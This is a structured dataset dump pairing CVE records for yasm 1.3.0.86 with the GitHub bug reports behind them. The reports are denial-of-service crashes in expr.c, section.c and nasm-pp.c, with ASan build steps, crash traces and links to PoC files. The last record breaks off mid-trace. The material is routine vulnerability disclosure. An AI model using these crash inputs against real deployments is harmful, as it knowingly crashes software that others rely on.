{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/yasm/yasm/issues/250" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.86.g9def:*:*:*:*:*:*:*", "matchCriteriaId": "C9D63BD2-36F6-440B-AC78-6F48EDDC12CD", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "Exploit", "Vendor Advisory" ]
[ "yasm", "yasm" ]
Issue
**The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component. **Vulnerability Type** Buffer Overflow **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13415866/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN info** ```` yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==4526==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000022498 at pc 0x00000062409c bp 0x7ffe67167c80 sp 0x7ffe67167c78 READ of size 4 at 0x606000022498 thread T0 #0 0x62409b in expr_delete_term /yasm/libyasm/expr.c:1019:19 #1 0x6239e8 in expr_simplify_identity /yasm/libyasm/expr.c:582:17 #2 0x61cdde in expr_level_op /yasm/libyasm/expr.c:792:23 #3 0x61e5e1 in expr_level_tree /yasm/libyasm/expr.c:881:9 #4 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #5 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #6 0x61d892 in yasm_expr__level_tree /yasm/libyasm/expr.c:907:9 #7 0x620539 in yasm_expr_get_intnum /yasm/libyasm/expr.c:1265:11 #8 0x612914 in yasm_bc_create_data /yasm/libyasm/bc-data.c:357:24 #9 0x5561cb in parse_exp /yasm/modules/parsers/nasm/nasm-parse.c:669:20 #10 0x551e07 in parse_line /yasm/modules/parsers/nasm/nasm-parse.c:289:10 #11 0x5516e8 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:231:18 #12 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #13 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #14 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #15 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #16 0x7f5599036c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) 0x606000022498 is located 0 bytes to the right of 56-byte region [0x606000022460,0x606000022498) allocated by thread T0 here: #0 0x496ba9 in realloc (/yasm/yasm+0x496ba9) #1 0x5157bc in def_xrealloc /yasm/libyasm/xmalloc.c:101:18 #2 0x61c515 in expr_level_op /yasm/libyasm/expr.c:738:9 #3 0x61e5e1 in expr_level_tree /yasm/libyasm/expr.c:881:9 #4 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #5 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #6 0x61d892 in yasm_expr__level_tree /yasm/libyasm/expr.c:907:9 #7 0x620539 in yasm_expr_get_intnum /yasm/libyasm/expr.c:1265:11 #8 0x612914 in yasm_bc_create_data /yasm/libyasm/bc-data.c:357:24 #9 0x5561cb in parse_exp /yasm/modules/parsers/nasm/nasm-parse.c:669:20 #10 0x551e07 in parse_line /yasm/modules/parsers/nasm/nasm-parse.c:289:10 #11 0x5516e8 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:231:18 #12 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #13 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #14 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #15 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #16 0x7f5599036c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /yasm/libyasm/expr.c:1019:19 in expr_delete_term Shadow bytes around the buggy address: 0x0c0c7fffc440: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fffc450: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fffc460: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fffc470: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fffc480: fd fd fd fd fd fd fd fa fa fa fa fa 00 00 00 00 =>0x0c0c7fffc490: 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4526==ABORTING ````
heap-buffer-overflow in the function expr_delete_term() at libyasm/expr.c:1019
https://api.github.com/repos/yasm/yasm/issues/250/comments
1
2023-11-20T14:26:40Z
2024-02-12T16:51:53Z
https://github.com/yasm/yasm/issues/250
2,002,324,400
250
[ -0.0400124154984951, 0.04272465035319328, -0.0024798051454126835, -0.002981358440592885, 0.042472999542951584, 0.029722711071372032, -0.0031316496897488832, 0.03662911802530289, -0.000019673841961775906, 0.03363727405667305, -0.03587416559457779, 0.01971261575818062, 0.011037667281925678, ...
1,103
This is a GitHub Issue repo:yasm owner:yasm Title : heap-buffer-overflow in the function expr_delete_term() at libyasm/expr.c:1019 Issue date: --- start body --- **The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component. **Vulnerability Type** Buffer Overflow **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13415866/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN info** ```` yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==4526==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000022498 at pc 0x00000062409c bp 0x7ffe67167c80 sp 0x7ffe67167c78 READ of size 4 at 0x606000022498 thread T0 #0 0x62409b in expr_delete_term /yasm/libyasm/expr.c:1019:19 #1 0x6239e8 in expr_simplify_identity /yasm/libyasm/expr.c:582:17 #2 0x61cdde in expr_level_op /yasm/libyasm/expr.c:792:23 #3 0x61e5e1 in expr_level_tree /yasm/libyasm/expr.c:881:9 #4 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #5 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #6 0x61d892 in yasm_expr__level_tree /yasm/libyasm/expr.c:907:9 #7 0x620539 in yasm_expr_get_intnum /yasm/libyasm/expr.c:1265:11 #8 0x612914 in yasm_bc_create_data /yasm/libyasm/bc-data.c:357:24 #9 0x5561cb in parse_exp /yasm/modules/parsers/nasm/nasm-parse.c:669:20 #10 0x551e07 in parse_line /yasm/modules/parsers/nasm/nasm-parse.c:289:10 #11 0x5516e8 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:231:18 #12 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #13 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #14 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #15 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #16 0x7f5599036c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) 0x606000022498 is located 0 bytes to the right of 56-byte region [0x606000022460,0x606000022498) allocated by thread T0 here: #0 0x496ba9 in realloc (/yasm/yasm+0x496ba9) #1 0x5157bc in def_xrealloc /yasm/libyasm/xmalloc.c:101:18 #2 0x61c515 in expr_level_op /yasm/libyasm/expr.c:738:9 #3 0x61e5e1 in expr_level_tree /yasm/libyasm/expr.c:881:9 #4 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #5 0x61e290 in expr_level_tree /yasm/libyasm/expr.c:865:17 #6 0x61d892 in yasm_expr__level_tree /yasm/libyasm/expr.c:907:9 #7 0x620539 in yasm_expr_get_intnum /yasm/libyasm/expr.c:1265:11 #8 0x612914 in yasm_bc_create_data /yasm/libyasm/bc-data.c:357:24 #9 0x5561cb in parse_exp /yasm/modules/parsers/nasm/nasm-parse.c:669:20 #10 0x551e07 in parse_line /yasm/modules/parsers/nasm/nasm-parse.c:289:10 #11 0x5516e8 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:231:18 #12 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #13 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #14 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #15 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #16 0x7f5599036c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /yasm/libyasm/expr.c:1019:19 in expr_delete_term Shadow bytes around the buggy address: 0x0c0c7fffc440: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fffc450: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fffc460: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fffc470: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fffc480: fd fd fd fd fd fd fd fa fa fa fa fa 00 00 00 00 =>0x0c0c7fffc490: 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fffc4e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4526==ABORTING ```` --- end body --- comments : --- start comments --- --- end comments ---
5,995
CVE-2023-49557
2024-01-03T00:15:09.147
An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/yasm/yasm/issues/253" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.86.g9def:*:*:*:*:*:*:*", "matchCriteriaId": "C9D63BD2-36F6-440B-AC78-6F48EDDC12CD", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "Exploit", "Vendor Advisory" ]
[ "yasm", "yasm" ]
Issue
**The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component. **Vulnerability Type** segmentation violation **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13466305/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN Info** ```` yasm: file name already has no extension: output will be in `yasm.out' AddressSanitizer:DEADLYSIGNAL ================================================================= ==4485==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004fe6c6 bp 0x7ffdc1e64920 sp 0x7ffdc1e64910 T0) ==4485==The signal is caused by a READ memory access. ==4485==Hint: address points to the zero page. #0 0x4fe6c6 in yasm_section_bcs_first /yasm/libyasm/section.c:619:12 #1 0x55ad2f in parse_expr6 /yasm/modules/parsers/nasm/nasm-parse.c:1486:21 #2 0x55bbfd in parse_expr5 /yasm/modules/parsers/nasm/nasm-parse.c:1306:9 #3 0x55b8ad in parse_expr4 /yasm/modules/parsers/nasm/nasm-parse.c:1278:9 #4 0x55b54d in parse_expr3 /yasm/modules/parsers/nasm/nasm-parse.c:1250:9 #5 0x55b36a in parse_expr2 /yasm/modules/parsers/nasm/nasm-parse.c:1243:5 #6 0x55b18a in parse_expr1 /yasm/modules/parsers/nasm/nasm-parse.c:1237:5 #7 0x55904a in parse_expr0 /yasm/modules/parsers/nasm/nasm-parse.c:1231:5 #8 0x558e6a in parse_bexpr /yasm/modules/parsers/nasm/nasm-parse.c:1225:5 #9 0x55f2af in parse_operand /yasm/modules/parsers/nasm/nasm-parse.c:1043:28 #10 0x554545 in parse_instr /yasm/modules/parsers/nasm/nasm-parse.c:751:41 #11 0x55511f in parse_exp /yasm/modules/parsers/nasm/nasm-parse.c:566:10 #12 0x551e07 in parse_line /yasm/modules/parsers/nasm/nasm-parse.c:289:10 #13 0x5516e8 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:231:18 #14 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #15 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #16 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #17 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #18 0x7f2094cb4c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #19 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /yasm/libyasm/section.c:619:12 in yasm_section_bcs_first ==4485==ABORTING ```` **Source Code** ````c 616 yasm_bytecode * 617 yasm_section_bcs_first(yasm_section *sect) 618 { --->619 return STAILQ_FIRST(&sect->bcs); 620 } 621 622 yasm_bytecode * 623 yasm_section_bcs_last(yasm_section *sect) 624 { ````
SEGV in yasm_section_bcs_first() at libyasm/section.c:619
https://api.github.com/repos/yasm/yasm/issues/253/comments
1
2023-11-26T08:48:59Z
2024-01-03T11:22:18Z
https://github.com/yasm/yasm/issues/253
2,010,956,429
253
[ 0.014690331183373928, 0.029125671833753586, -0.005142324138432741, 0.010086322203278542, 0.051763229072093964, 0.004363184329122305, -0.009604671970009804, 0.03782370686531067, -0.004472971893846989, 0.04536011442542076, -0.04700339213013649, 0.014102434739470482, 0.029465658590197563, 0.0...
1,104
This is a GitHub Issue repo:yasm owner:yasm Title : SEGV in yasm_section_bcs_first() at libyasm/section.c:619 Issue date: --- start body --- **The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component. **Vulnerability Type** segmentation violation **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13466305/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN Info** ```` yasm: file name already has no extension: output will be in `yasm.out' AddressSanitizer:DEADLYSIGNAL ================================================================= ==4485==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004fe6c6 bp 0x7ffdc1e64920 sp 0x7ffdc1e64910 T0) ==4485==The signal is caused by a READ memory access. ==4485==Hint: address points to the zero page. #0 0x4fe6c6 in yasm_section_bcs_first /yasm/libyasm/section.c:619:12 #1 0x55ad2f in parse_expr6 /yasm/modules/parsers/nasm/nasm-parse.c:1486:21 #2 0x55bbfd in parse_expr5 /yasm/modules/parsers/nasm/nasm-parse.c:1306:9 #3 0x55b8ad in parse_expr4 /yasm/modules/parsers/nasm/nasm-parse.c:1278:9 #4 0x55b54d in parse_expr3 /yasm/modules/parsers/nasm/nasm-parse.c:1250:9 #5 0x55b36a in parse_expr2 /yasm/modules/parsers/nasm/nasm-parse.c:1243:5 #6 0x55b18a in parse_expr1 /yasm/modules/parsers/nasm/nasm-parse.c:1237:5 #7 0x55904a in parse_expr0 /yasm/modules/parsers/nasm/nasm-parse.c:1231:5 #8 0x558e6a in parse_bexpr /yasm/modules/parsers/nasm/nasm-parse.c:1225:5 #9 0x55f2af in parse_operand /yasm/modules/parsers/nasm/nasm-parse.c:1043:28 #10 0x554545 in parse_instr /yasm/modules/parsers/nasm/nasm-parse.c:751:41 #11 0x55511f in parse_exp /yasm/modules/parsers/nasm/nasm-parse.c:566:10 #12 0x551e07 in parse_line /yasm/modules/parsers/nasm/nasm-parse.c:289:10 #13 0x5516e8 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:231:18 #14 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #15 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #16 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #17 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #18 0x7f2094cb4c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #19 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /yasm/libyasm/section.c:619:12 in yasm_section_bcs_first ==4485==ABORTING ```` **Source Code** ````c 616 yasm_bytecode * 617 yasm_section_bcs_first(yasm_section *sect) 618 { --->619 return STAILQ_FIRST(&sect->bcs); 620 } 621 622 yasm_bytecode * 623 yasm_section_bcs_last(yasm_section *sect) 624 { ```` --- end body --- comments : --- start comments --- --- end comments ---
3,888
CVE-2023-49558
2024-01-03T00:15:09.203
An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/yasm/yasm/issues/252" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.86.g9def:*:*:*:*:*:*:*", "matchCriteriaId": "C9D63BD2-36F6-440B-AC78-6F48EDDC12CD", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
[ "yasm", "yasm" ]
Issue
**The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component. **Vulnerability Type** segmentation violation **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13465912/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN Info** ```` yasm: file name already has no extension: output will be in `yasm.out' AddressSanitizer:DEADLYSIGNAL ================================================================= ==4490==ERROR: AddressSanitizer: SEGV on unknown address 0x60ffffffffc8 (pc 0x00000056d207 bp 0x7ffd39055dc0 sp 0x7ffd39055740 T0) ==4490==The signal is caused by a READ memory access. #0 0x56d207 in expand_mmac_params /yasm/modules/preprocs/nasm/nasm-pp.c:4013:47 #1 0x5685cf in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5079:21 #2 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #3 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #4 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #5 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #6 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #7 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #8 0x7f79d306fc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /yasm/modules/preprocs/nasm/nasm-pp.c:4013:47 in expand_mmac_params ==4490==ABORTING ```` **Source Code** ```` 4009 tt = mac->params[n]; 4010 } 4011 if (tt) 4012 { --->4013 for (i = 0; i < mac->paramlen[n]; i++) 4014 { 4015 *tail = 4016 new_Token(NULL, tt->type, tt->text, 4017 0); 4018 tail = &(*tail)->next; ````
SEGV in the function expand_mmac_params() at modules/preprocs/nasm/nasm-pp.c:4013
https://api.github.com/repos/yasm/yasm/issues/252/comments
3
2023-11-26T04:38:16Z
2024-03-23T09:32:24Z
https://github.com/yasm/yasm/issues/252
2,010,889,074
252
[ -0.02080458588898182, 0.033124931156635284, -0.005848664324730635, 0.010703301057219505, 0.05714960768818855, 0.027090761810541153, -0.027258766815066338, 0.03995712473988533, -0.013769387267529964, 0.029260823503136635, -0.03794106841087341, 0.015176426619291306, 0.0339929573237896, 0.017...
1,105
This is a GitHub Issue repo:yasm owner:yasm Title : SEGV in the function expand_mmac_params() at modules/preprocs/nasm/nasm-pp.c:4013 Issue date: --- start body --- **The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component. **Vulnerability Type** segmentation violation **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13465912/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN Info** ```` yasm: file name already has no extension: output will be in `yasm.out' AddressSanitizer:DEADLYSIGNAL ================================================================= ==4490==ERROR: AddressSanitizer: SEGV on unknown address 0x60ffffffffc8 (pc 0x00000056d207 bp 0x7ffd39055dc0 sp 0x7ffd39055740 T0) ==4490==The signal is caused by a READ memory access. #0 0x56d207 in expand_mmac_params /yasm/modules/preprocs/nasm/nasm-pp.c:4013:47 #1 0x5685cf in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5079:21 #2 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #3 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #4 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #5 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #6 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #7 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #8 0x7f79d306fc86 in 